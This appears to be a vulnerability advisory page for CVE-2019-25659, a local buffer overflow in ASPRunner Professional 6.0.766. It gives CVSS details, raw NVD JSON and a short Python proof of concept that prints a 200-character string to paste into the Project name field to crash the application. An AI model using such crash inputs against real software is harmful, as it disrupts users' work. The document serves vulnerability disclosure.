Security Vulnerability Report
CVE-2019-25659 CVSS 6.2 MEDIUM


Published: 2026-04-05 21:16:43
Last Modified: 2026-04-16 16:15:56

Description

ASPRunner Professional 6.0.766 contains a local buffer overflow vulnerability that allows attackers to cause a denial of service by supplying an excessively long project name. Attackers can paste 180 or more characters into the Project name field during project creation to trigger an application crash.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ASPRunner Professional 6.0.766

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2019-25659
# This script generates a payload to trigger the buffer overflow.
# Usage: Run the script, copy the output, and paste it into the "Project name" field in ASPRunner Professional 6.0.766.

def generate_crash_payload():
    # Vulnerability is triggered with 180+ characters
    payload = "A" * 200
    return payload

if __name__ == "__main__":
    print("[+] Generating payload for CVE-2019-25659...")
    payload = generate_crash_payload()
    print("[+] Payload generated (Length: {}):".format(len(payload)))
    print(payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25659", "sourceIdentifier": "[email protected]", "published": "2026-04-05T21:16:42.707", "lastModified": "2026-04-16T16:15:56.380", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ASPRunner Professional 6.0.766 contains a local buffer overflow vulnerability that allows attackers to cause a denial of service by supplying an excessively long project name. Attackers can paste 180 or more characters into the Project name field during project creation to trigger an application crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://www.xlinesoft.com/asprunnerpro", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46293", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/asprunner-professional-local-buffer-overflow-dos", "source": "[email protected]"}]}}